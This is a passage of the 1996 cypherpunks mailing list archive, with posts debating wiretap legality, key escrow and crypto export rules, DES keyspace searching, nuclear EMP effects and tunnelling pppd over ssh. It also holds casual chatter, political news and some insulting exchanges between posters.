Since up until now people have not had a choice, I think it's appropriate to 
assume that every telephone customer would have been entitled to insist on 
an anti-wiretap clause, and got it.


>>As I understand it, there is a principle in law that all affected parties to 
>>a dispute must be included in a proceeding. (To ensure that each can protect 
>>his own rights.)  Obviously, targets of wiretaps have not been informed, and 
>>thus can't possibly have been included. 
>
>on the other hand, there are clear laws that say you can't withhold
>evidence. 

That's misleading.  If a cop wants in your house to collect evidence but he 
doesn't have a warrant, not letting him in is "withholding evidence."   But 
that's obviously okay.  So you need to qualify that claim.


>>While I'm sure that I will be corrected if this is wrong, somehow I doubt 
>>whether there has EVER been a "before-the-fact", full challenge of a wiretap 
>>order _including_ representation for the target of the wiretap.  Further, I 
>>also doubt whether there is frequently ANY SORT of challenge to a wiretap  
>>by a telephone company, even when the target was not informed.  Quite 
>>simply, the telephone company does not consider itself to be in the business 
>>of protecting the rights of its customers!  And without real challenges, 
>>there can be no presumed validity to such warrants.
>
>no, you have it backwards; without real challenges, there 
>is no validity to anyone trying to defeat the status quo.

That depends on whose burden of proof you think it is.  Since:

1.  Wiretaps were done illegally before 1968, demonstrating that the people 
involved (cops, government officials) don't think they have to obey the law 
anyway.  This should destroy any presumption on your part that wiretaps are 
constitutional, because those people are the main ones pushing wiretaps.

2.  60% of the public opposes wiretaps, period.  (I think it's arguable that 
if most of the public decides that society should do without wiretaps, they 
are entitled to do this.  Otherwise, "Who's country is it?")

3.  Wiretaps do not resemble ordinary searches, because the target is not 
informed, and he's not given a chance to challenge them.

4.  Wiretaps have "never" been adequately challenged, precisely because the 
only outside people who know about them have no motivation to do them.  
(Primarily telephone companies.)


I'd say the bulk of the evidence is that the legal system accepts wiretaps 
simply as a convenience, without genuinely believing that they are 
constitutional.

>
>[bernstein, etc]
>>Since it has always been legal to use encryption (in the US), they're really 
>>not "challenging the cryptographic status quo."
>
>no, ITAR has been around a long time and they are challenging it. you're
>mixing up the issue.

No, YOU'RE mixing it up.  _DOMESTIC_ wiretaps are being compared with 
DOMESTIC use of encryption.  ITAR says nothing about wiretaps.  

The government is pushing Clipper et al based primarily on domestic wiretap issues.

>>I don't know about you, but somehow I'm past the idea that it's possible to 
>>reliably get unbiased justice in court.  Know what I mean?
>
>ah yes, we revert to the basic cypherpunk nihilist position oft repeated
>by lucky green, tcmay etc-- "essentially, we're screwed"

Not really.  It's just that when there's enough evidence of dishonesty 
already in the treatment of this issue in the courts, there is no reason to 
presume that the right decision will be reached in the future.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 12:59:37 +0800
To: cypherpunks@toad.com
Subject: Re: "Macintosh -- the Surveillance System for the Rest of Us
In-Reply-To: <v03007801ae79afc6404c@[207.167.93.63]>
Message-ID: <3255CDE2.B17@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 1:17 PM -0700 10/3/96, Lucky Green wrote:
> >On Thu, 3 Oct 1996, Timothy C. May wrote:
> >> I think we should support Microsoft and Netscape in their nonparticipation
> >> in the Cabal. Sometimes being an 800-pound gorilla has its advantages.
> >Indeed we do need to support Netscape and <sigh> Microsoft as long as
> >they oppose GAK.

[some text deleted]

> (Why Apple would go along with this, while Microsoft and Netscape are
> apparently not playing ball, is incomprehensible to me. Apple risks
> alienating its remaining core user base, who often characterize Microsoft
> as "the Borg." So, Apple capitulates, while MS does not. I guess the
> "Macintosh Crypto Forum" didn't do a lot of good, did it?)

[more text deleted]

At the risk of offending some people, it occurs to me that there were 
considerable arguments going around about Windows etc. copying ideas 
from Apple Mac and so on, but looking at it from the other end, since 
when does the appearance of crypto programs on a Mac make it something 
it's not?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 5 Oct 1996 14:32:27 +0800
To: cypherpunks@toad.com
Subject: Re: MacGAK: Tim has a snit. Again.
In-Reply-To: <199610042132.OAA11336@mail.pacifier.com>
Message-ID: <mZTaVD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> At 11:30 AM 10/4/96 -0400, Robert Hettinga wrote:
>
> >It's interesting to note that the only person who is supposed to be in your
> >killfile is Perry Metzger, even though you respond to him anyway,
> >especially when he says something which offends your vanity. So, such a
> >killfiling claim is probably dubious.  Since such luminaries as VZNuri, Dr.
> >Vulis, and Jim Bell are *not* in your killfile, evidenced by your
> >voluminous replies to them,
>
> Aw, C'mon Bob!  I resent being placed in the same short list as Nuri and
> Vulis.  While some people may consider my ideas to be similarly wacky, I try
> to not be NEARLY as rude as those other guys (singular?).

Clarification: I think AP is a cool idea, but Jim Bell is an obnoxious asshole,
almost (not quite) as ignorant of cryptography as the senile Timmy May (fart).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 5 Oct 1996 07:09:35 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: How to fight GAK by obeying the law
In-Reply-To: <199610040457.VAA25485@server1.chromatic.com>
Message-ID: <Pine.LNX.3.94.961004195932.205A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Ernest Hua wrote:

> Date: Thu, 3 Oct 1996 21:57:54 -0700 (PDT)
> From: Ernest Hua <hua@chromatic.com>
> To: cypherpunks@toad.com
> Cc: hua@chromatic.com
> Subject: How to fight GAK by obeying the law
> 
> It seems that the best method for fighting GAK is to accelerate
> wide-spread domestic use of freely redistributable non-GAK crypto.
> 
> The Lynux automatic firewall concept that John Gilmore is pushing is a
> great idea, but it is still brewing, and he's shooting for developing
> an exportable ... er ... importable version.  That will take much time
> to develop, and time is what we don't have much of.
> 
> We need to work on applications, API's, flexible software modules, etc.
> and the primary reason we cannot do it so easily is because we cannot
> redistribute the software so easily.
> 
> First thing we definitely need is a way to determine with fairly good
> accuracy, whether a host is in the U.S.  This MUST be an automagic
> mechanism ...  no person involved so there is little delay in getting
> the goodies.  The best implementation would automatically set the
> group of an incoming anonymous FTP session daemon to a special group
> if there is a high degree of certainty that the originating host is
> within the U.S.
> 
> Second thing we definitely need is a convenient way and universal way
> to clearly notify the recipient of the current export restrictions of
> such software, so that the recipient knows what he/she is in for.
> 
> Basically, we have to do our best to NOT violate the law, no matter
> how much we hate it.  What the government wants to happen is that
> everyone will get hooked on GAK, and it will be too inconvenient to
> use something else.  A good counter-strategy is to get everyone hooked
> on the good stuff.
> 
> Right now, the FBI/NSA is looking for an excuse to prosecute anyone
> not jumping on their bandwagon.  We have to avoid give them an excuse
> to prosecute us while still enabling rapid application development.
> 
> Communication and distribution are key.
> 
> Ern
> 

	While I think your ideas are certainly good, and will work out
well, they are not necisarily the "best" way (although, any means to the
same ends are essentially the same, assuming no drastic measures, i.e.
Machavelian concepts).  Its a shame that in the US, teachers seem to be
afraid to teach the term "Civil Disobediance".  

	I think its a shame that people in 20th Century America are afraid
to stand up against their government.  I'm not saying rebel in the
streets, but there are certainly other things one can do when a law is
unjust.

	One idea is simply to give them so many cases that they can't
_POSSIBLY_ pros^H^H^Hersicute <g> them all.  If _EVERY ONE_ of us went and
made it perfectly obvious that we beleived the ITAR is wrong, forceful
implementation of GAK is bad, and that we don't give a fuck what they
think, or that its "illegal" to export crypto, then they wouldn't stand a
chance.

	Just a suggestion.  I'm certainly not a brave enough person to do
this, but I wish someone was.

 --Deviant
Blood is thicker than water, and much tastier.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 5 Oct 1996 06:56:42 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <Pine.SUN.3.94.961003165524.1737A-100000@polaris>
Message-ID: <Pine.LNX.3.94.961004200836.205C-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Black Unicorn wrote:

> Date: Thu, 3 Oct 1996 17:07:47 -0400 (EDT)
> From: Black Unicorn <unicorn@schloss.li>
> To: jim bell <jimbell@pacifier.com>
> Cc: Remo Pini <rp@rpini.com>, cypherpunks@toad.com
> Subject: Re: Fw: Re: ITAR satellite provision
> 
[...]
> "A launch vehicle or payload shall not, by reason of the launching of such
> vehicle, be considered an export for purposes of this subchapter."
> 
> Focus on "by reason of launching of such vehicle,"
> 
> Launching a vehicle alone is not export.  It takes more than launch to
> make it an export.  More than the launching is not much.
[...]
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 

So.. if I were to take PGP, put it on a floppy disk, tape it to a model
rocket, and launch it across the mexican border, that's not exporting it
(although the FAA might complain)?

 --Deviant
"Whatever you do will be insignificant, but it is very important that
you do it."  --Mahatma Gandhi






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Sat, 5 Oct 1996 13:19:59 +0800
Subject: Re: FUCK!!!!!!;-)
In-Reply-To: <1.5.4.32.19961003141245.006604ec@pop3.interramp.com>
Message-ID: <199610050310.AA01791@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Or maybe this journalist, like most, doesn't know what the fuck he's
> >talking about?
> 
> To which this card-carrying member of the media replies:
> 
> Companies cited in the PRESS RELEASE - that means public relations product,
> not journalism product - were involved in signing off on what went into the
> release. By definition, no member of the press was involved in producing
> this document
> 
> It seems directing questions to the companies would be a good idea.
> 
> Will Rodger
> Washington Bureau Chief
> Interactive Week.

You media monopoly asswipes love corporate press releases because
your too cheap to hire real journalists.

Yes, there's a problem with publishing ADS as news.  Look at the 
magazine shelfs and the newspapers for proof.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Mon, 7 Oct 1996 16:59:55 +0800
To: "'Vladimir Z. Nuri'" <vznuri@netcom.com>
Subject: RE: DESCrack keyspace partitioning
Message-ID: <01BBB3E4.1BE61700@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


: 	Re: DESCrack keyspace partitioning 

of course, any number in the range of a random number
generator is theoretically as likely/unlikely to appear.

however, consider the case in which DES keys are generated
from ascii sequences or words that people enter in at
password prompts, which is in fact how the unix passwd file
word. these obviously have far less randomness
and Gary's attempt to narrow the keyspace is highly 
relevant.

>> Gary?


also, I took his post as suggesting that some parts of the
keyspace ought to be searched at higher priority than
others. in the above example, keys that correspond to 
ascii sequences typable on a keyboard should be searched
first in the keyspace.

>> Something like that.

a lot of systems use DES only in conjuction with a one-time-key
generated for a particular message. (similar to the way
PGP uses IDEA for the session key, and transmits this encoded
key using RSA). in general I would say these could be considered
random in a way that the previous "less-than-random" property
doesn't hold.

>> Depends.  Not if generated by certain processes that **tend** to produce
non-entropic values.  But I have more work to do on this....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 16:07:51 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610042004.NAA27789@netcom7.netcom.com>
Message-ID: <3255D400.1A48@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:

[some text deleted]

> I think there may be a legitimate argument here that might have
> legal merit that a reasonable "search and seizure" ought to
> involve the knowledge of the participant, and that unreasonable
> searches and seizures often do not. hence, wiretapping without
> suspect agreement may be illegal? (in all the other ways that
> evidence is obtained through warrants/subpoenas, one needs
> the cooperation of the suspect?)  obviously the government would
> argue that the cooperation of the suspect is irrelevant and
> impossible. what exactly does it mean to "present a warrant"
> or subpoena? is there a right to refuse such a subpoena similar
> to the way one is guaranteed freedom from self-incrimination?

The point is, the govt. already has the info, much as if you had a bunch 
of computers and digiboards or whatever monitoring all your neighbors' 
phone calls.  It's whether they can legally present the info in court to 
put you away or not that matters.  The law tends to move in the 
direction of recent decisions, particularly in saying that the police 
"acted in good faith" in collecting the info, and that they "didn't 
conspire to collect the info deliberately knowing it wasn't legal", etc.

Problem is, the govt. will continue to ease the restrictions on the 
latter argument, since in the former, they *always* act in "good faith".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 6 Oct 1996 02:42:07 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Margaret Milner Richardson loses her breakfast...
Message-ID: <199610051621.JAA08058@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:49 PM 10/3/96 -0400, Robert Hettinga wrote:
>>From the Wall Street Journal Wednesday October 2, Page 1:
>
>Use of the internet to attract tax-dodgers rings alarm bells at the IRS.
>The rapidly expanding new worlds of the internet and electronic money are
>stirring deep concern at the IRS. "We know that some foriegn banks are now
>using the internet to solicit new customers with promises of complete
>anonymity and a haven from all taxes," IRS commissioner Margaret Milner
>Richardson said.

Could someone please post a list of these banks and their ads.

"http://www.eub.com/abouteub.htm" offers tax free interest.  
(They seem to be a genuine bank)

http://www.britnet.co.uk/scope/  just sells books -- 
"perpetual tourist" and all that stuff.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 5 Oct 1996 15:33:38 +0800
To: cypherpunks@toad.com
Subject: Electromagnetic Pulse
In-Reply-To: <Pine.3.89.9610040641.A14153-0100000@netcom14>
Message-ID: <v03007800ae7b96a03b48@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:58 PM -0500 10/4/96, snow wrote:
>Mr. Green wrote:
>> On Wed, 2 Oct 1996, Adamsc wrote:
>> > I have strong
>> > doubts that someone would come up with a non-nuke that could destroy stuff
>> > indiscriminately within a useably large area.
>> Fuel/air bombs.
>
>     Wouldn't work real good in a city, and would leave most computers
>inside buildings working just fine, especially given any predomanance
>of underground powerlines.


By the way, it's a myth of our age that nukes destroy electronics!

The infamous "electomagnetic pulse," or EMP, was discovered by the American
side in the Cold War only during the extremely high altitude bursts over
Johnson Atoll, circa 1962. (This is the test where streetlights in Hawaii,
a thousand or more miles away, were burned out, etc.)

EMP results from the prompt gammas from a nuclear explosion interacting
with the upper atmosphere to produce a wavefront of electromagnetic energy
as the gammas interact with the uppper ionosphere. Ground-level bursts have
no such effects, though I wouldn;t want to be close to one.

The key is that the effects of near-ground-level bursts are _extremely_
localized. Shocking so, no pun intended. The largest bomb in the U.S.
arsenal, believed to be 20 MT, might leave a crater several miles in
diameter, but would hardly be felt 30 miles away. Certainly almost no
electronic devices would be damaged, except if close to the blast center.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stainles@bga.com (Dwight Brown)
Date: Sat, 5 Oct 1996 12:15:19 +0800
To: cypherpunks@toad.com
Subject: [Books] Kahn's *The Code Breakers*
Message-ID: <v02140b00ae7b6d0d56e8@[204.251.33.58]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My room-mate just brought me the latest catalog from Uncle Hugo's Science
Fiction Bookstore & Uncle Edgar's Mystery Bookstore.

The updated edition of Kahn's *The Code Breakers* is listed as being
expected by mid-November, with a cover price of $65. (No publisher listed.)

Hugo's can be reached at 612-824-6347, or unclehugo@aol.com. No connection
except as a satisfied customer.

==Dwight
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMlW+rYY4AzhdF11FAQEfzwP5AXP/63of9MPefzguLX5n9byRVUPcXOKT
cYJNdTGe9ErVb6skDNN7e4PiwlZPSV03OFgntsp9CBFed+2AN/d+EFI3kNyFWQ5p
fwEZ2u6VYINaQ0PhYaxneoMrxa+U8gnB5PZ8sa/Pwq4hhf6XxcOk7vUwKsLPQmeX
2KBLVLKeWj8=
=f5D5
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 5 Oct 1996 12:26:47 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: ADJ_ust
In-Reply-To: <Pine.3.89.9610040641.A14153-0100000@netcom14>
Message-ID: <199610050158.UAA00123@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Green wrote: 
> On Wed, 2 Oct 1996, Adamsc wrote:
> > I have strong
> > doubts that someone would come up with a non-nuke that could destroy stuff
> > indiscriminately within a useably large area.
> Fuel/air bombs.

     Wouldn't work real good in a city, and would leave most computers
inside buildings working just fine, especially given any predomanance
of underground powerlines.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 5 Oct 1996 15:57:16 +0800
To: cypherpunks@toad.com
Subject: Re: encrypting pppd?
In-Reply-To: <199610021431.JAA02934@linkdead.paranoia.com>
Message-ID: <534nh8$c4p@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <961002.235706.1R8.rnr.w165w@sendai.scytale.com>,
Roy M. Silvernail <roy@scytale.com> wrote:
>In list.cypherpunks, vax@linkdead.paranoia.com writes:
>
>> Anyone worked on, or know of a freely available, one of these beasts?
>
>What threat model does this address?  It'd be link encryption, where the
>best security is found in end-to-end encryption.

pppd doesn't necessarily run over a modem; you can "tunnel" it over another
IP connection.

I have in fact done this very thing.  Use ssh to (encrypted) log in to
the ppp server, and start pppd at each end.  It's been a while; I think I
had to tweak something to make it work over a pty instead of a serial port.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlXhZkZRiTErSPb1AQEidQP8DEYaAcDyJMFY7AyRL4Q03tD+REiqqKPZ
1I8stlu7sx9OVFAgitqAWeWdi5HeXop0YpyAP9yYFxI9JTw6TgXfpP2P38pJ3vvU
jebEyK+pVJnCw16As6rJJTNYlUFGlEqceuK8Bj4xNyrG1E4oGx8AEig4CT8RjGhk
AOj4aFd7y+8=
=aZOj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "! Drive" <drink@aa.net>
Date: Sat, 5 Oct 1996 14:21:03 +0800
To: <cypherpunks@toad.com>
Subject: Re: anagrams
Message-ID: <199610050424.VAA09345@ws6.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


I generally use wordsmith@wordsmith.org
Its preety quick!

----------
: Subject: anagrams
: Date: Friday, October 04, 1996 7:42 PM
: Fast(est?) anagram generator:
: 
: ftp://suburbia.net/pub/proff/original/gan/an-0.93.tar.gz
: (unix source and dos executable)
: 
: 
: Some Anagrams Found Using an-0.92
: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
: Free Software Foundation  -  I'd fan out tons of freeware!
: National Security Agency  -  Lusty yearning at cocaine.
: President Dole            -  Led despite Ron.
: Central Intelligence Agency - Langley: Inelegant, eccentric.
: 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 5 Oct 1996 15:41:08 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610042004.NAA27789@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.94.961004210349.21413A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996, Vladimir Z. Nuri wrote:

[...]

> he made the distinction of "search and seizure" made with
> the knowledge of the person involved, and "search and
> seizure" such as wiretapping done without the knowledge
> of the person surveilled.
> 
> if one were to try to say that wiretapping was unconstitutional,
> it seems one would have to define why it is an *unreasonable*
> kind of search and seizure. and this distinction might be a
> great, prime candidate: because the participant is *unaware*
> of the "seizure," there is too great a potential for abuse.

This is hardly news.  An old and inconsequential distinction
unfortunately.

> it seems to me many people's fears here boil down to this
> fear of the government surveilling them without their knowledge,
> of them being denied the right to choose to be in contempt of
> court and reject handing over information when presented with
> a warrant/subpoena. (is this a right? is it being broken by surreptitious
> surveillance?)

"Right to choose to be in contempt of court" ?  If only I could attach a
sound file with my howling laughter to this post.

> ==
> 
> I am really amazed that there isn't much case law on wiretaps, which
> have been around a long time. at least it is rarely quoted here.
> what exactly is a legal wiretap? has anyone challenged the fundamental
> authority of the government in making wiretaps in which subjects
> are unaware of the metaphorical "search and seizure" going on?

Do not make the mistake of thinking there is no case law on wiretap simply
because you have not/are too lazy to go to the library and look it up.

> recent Bernstein and Junger cases are going to be fantastic milestones
> in our legal system for challenging the cryptographic status quo.
> I wonder if cpunks might be interested in challenging the 
> wiretap status quo!! it would seem like the first logical step.

Tried and failed decades ago.

> the FBI has often said they don't want to expand their powers in 
> wiretapping areas. but are those powers they have right now legitimate?
> if they are not, as many here seem to argue, 
> then they ought to be challenged in court ala the one-man-guerilla
> attacks like Bernstein and Junger. (any takers? <g>)

Again, you're late.  Several years too late.

> anyway, I propose that cpunks try to collect all the minutia in the
> case law about wiretaps and try to make the case that wiretapping
> that the FBI has enjoyed is itself not legitimate, and therefore
> any extension of it (such as Clipper) is also illegitimate.

You propose to refight a case soundly resolved ages ago and you propose to
get the rest of the list to do your homework for you.

I propose you go to the library and do your own work for a change.

> ==
> 
> more and more I wonder if this is one of the key differences between
> libertarian and spook bureacrat's views on GAK, key escrow, key
> recovery (let us put it all under the heading "key access"). the
> spooks seem to emphasize that they should be able to get access
> to communications without giving anyone the opportunity to refuse
> or possibly even know about such access. libertarians seem to
> insist that this is a violation of privacy and due process etc.

I wonder what caused you to think this was some kind of novel revelation.

> I think there may be a legitimate argument here that might have
> legal merit that a reasonable "search and seizure" ought to
> involve the knowledge of the participant, and that unreasonable
> searches and seizures often do not. hence, wiretapping without
> suspect agreement may be illegal? (in all the other ways that
> evidence is obtained through warrants/subpoenas, one needs
> the cooperation of the suspect?)  obviously the government would
> argue that the cooperation of the suspect is irrelevant and
> impossible. what exactly does it mean to "present a warrant"
> or subpoena? is there a right to refuse such a subpoena similar
> to the way one is guaranteed freedom from self-incrimination?

I know you think you're being very clever and original, as if somehow you
aquired the skills of a noted constitutional scholar whilest no one was
looking. I also know that you have not bothered to research your own
claims.  I can't decide, however, if this is cleverness on your part in
trying to get someone else to do all your work for you, in which case it's
not working on me, or simple laziness, in which case it's apparent and
unsurprising.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Sat, 5 Oct 1996 13:17:10 +0800
To: cypherpunks@toad.com
Subject: ironic, no?
Message-ID: <199610050339.VAA06380@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Dr." Vulis - KOTM whines:

>What is the crypto-relevance of the above-quoted passage?

what is the irony-factor in the above statement?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sat, 5 Oct 1996 14:01:31 +0800
To: cypherpunks@toad.com
Subject: pumpcon info
Message-ID: <Pine.LNX.3.95.961004214258.3691A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   Does anyone have info on pumpcon for next month? If so please send it
to me email. I am looking for the hotel and the exact dates. Also is it
open invite? 
                    Thanks in Advance,
                        moroni






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petr Snajdr <snajdr@pvt.net>
Date: Sat, 5 Oct 1996 07:07:16 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: WINDOWS NT ????
In-Reply-To: <199610041914.OAA00187@smoke.suba.com>
Message-ID: <3254F5FD.DA54534@pvt.net>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> 
> > pclow wrote:
> > > Adamsc wrote:
> > > > > is Windows NT secured system ?
> > > NT? Secured? hahahahahahahahahahahahahahahahhahahahahahahaha
> >                         8-)
> > How ?
> 
>      By turning off the machine, unpluging the ethernet, moving the
> hard drive to another state...
> 

    8-) ..and Os/2,unix .etc.etc. not ?


--

    Petr Snajdr
*--------------------------------------------------------------*
| "640K should be enough for anybody." - Bill Gates            |
|                                                              |
| "OS/2 is destined to be a very important piece of software.  |
| During the next 10 years, millions of programmers and users  |
| will utilize this system." - Bill Gates (Again)              |
*--------------------------------------------------------------*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: travel23@juno.com (The Traveler)
Date: Sat, 5 Oct 1996 13:29:48 +0800
To: cypherpunks@toad.com
Subject: The lesser-known presidential candidates' views
Message-ID: <19961004.222423.3230.0.travel23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


[Article carried by the A.P.] 

      Campaigning mostly in obscurity, these lesser-known men and one
woman, have managed to get their names on most if not all 50 state
ballots.
      Here they are:
      Harry Browne, Libertarian Party: A best-selling investment writer,
he's on the ballot in all 50 states. He says the Libertarians ``believe
in individual liberty, personal responsibility and freedom from
government.'' The party seeks to end income tax and ``to reduce
government to the absolute minimum possible.'' Browne, 63, opposes
Internet censorship and supports a repeal of the assault weapons ban.
The Libertarians have been around for about a quarter of a century.
Their platform includes proposals to deregulate the health-care
industry, privatize Medicare and Medicaid and legalize drugs.
      Ralph Nader, Green Party: Primary concerns are environmental, but
Nader has long fought against large corporations in the role of consumer
advocate. Nader's name is on 21 state ballots. The party hopes to
increase that number to 30 and to encourage write-in campaigns in the
remaining states. Nader, 62, plans to use his candidacy as the catalyst
for starting an ``aggressive political force for the future.'' He says
the two major parties have become so similar in their views that voters
are left with little choice.  When Nader was nominated to head the Green
Party ticket, he said, ``It's time this country has a political
alternative -- a progressive mainstream that defends consumers and
workers against corporate welfare.''
      John Hagelin, Natural Law Party: On the ballot in 47 states --
and still trying in New Hampshire, Georgia and Oklahoma -- the Natural
Law Party hopes to ``bring the light of science into politics.'' Its
platform includes prevention-oriented health care, renewable energy and
sustainable agriculture without pesticides.  The party also wants a
cost-effective government with a safety net that promotes well-being,
including a 10 percent flat tax by 2002.  Hagelin, 42, is a
Harvard-educated physics professor and one of the party's founders. In
1992 he garnered less than 40,000 votes. The Natural Law Party advocates
transcendental meditation, contending it can lower the crime rate by
setting up meditation groups in prisons, and can serve as a foreign
policy tool by supporting groups who practice it in other countries.
      Howard Phillips, U.S. Taxpayers Party: Hopes to restore American
jurisprudence to its ``heritage of biblical liberty,'' abolish the
Internal Revenue Service and eliminate federal income taxes, capital
gains taxes and inheritance taxes. Phillips' party also supports ending
legalized abortion and reducing ``the reach, the grasp and take of the
federal government.'' The party platform says that while the United
States should be a friend to liberty everywhere, it should only invest
and fight to guarantee it for the United States. Phillips, 55, supports
dismantling the Education, Housing and Urban Development departments and
end government support of the arts. He is on the ballot in about 40
states.
      Monica Moorehead, Workers World Party: Calls for tripling the
minimum wage, making polluters pay for a clean environment, furthering
affirmative action and ensuring equal rights for women, lesbians, gays
and bisexuals. The party supports big cuts in military spending.
Moorehead's party, which is on the ballot in 12 states, believes the
election is dominated by the rich and considers the Workers World Party
campaign an opportunity to bring working-class politics to a broad
audience. It is opposed to capitalism, advocating socialism instead.
Moorehead, 44, has been a leader in the party since 1979.
      James Harris, Socialist Workers Party: Stands for ``the struggles
of the oppressed and exploited against the increasingly brutal assault
by the wealthy minority the world over,'' according to the party
platform. The Socialist Workers Party supports the right of Cuba to
defend its sovereignty. Harris, 48, a former meatpacker in Atlanta, is
on about 10 ballots. Harris criticizes the government's response to
black church burnings, airline safety and labor unions. The Socialist
Workers Party accuses the major presidential candidates of continuing
``their war preparations in response to the increasing world disorder,
using threats or military force from Cuba to Liberia, from China to
Korea, and by backing the Israeli regime's brutal assault on Lebanon.''




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 17:35:47 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Electromagnetic Pulse
Message-ID: <199610050620.XAA14223@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:46 PM 10/4/96 -0800, Timothy C. May wrote:

>
>The key is that the effects of near-ground-level bursts are _extremely_
>localized. Shocking so, no pun intended. The largest bomb in the U.S.
>arsenal, believed to be 20 MT, might leave a crater several miles in
>diameter, but would hardly be felt 30 miles away. Certainly almost no
>electronic devices would be damaged, except if close to the blast center.
>
>--Tim May

What about the neutrons?  What is the effect of a neutron flux on silicon devices?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 16:51:19 +0800
To: "Dale Thorn" <ericm@lne.com>
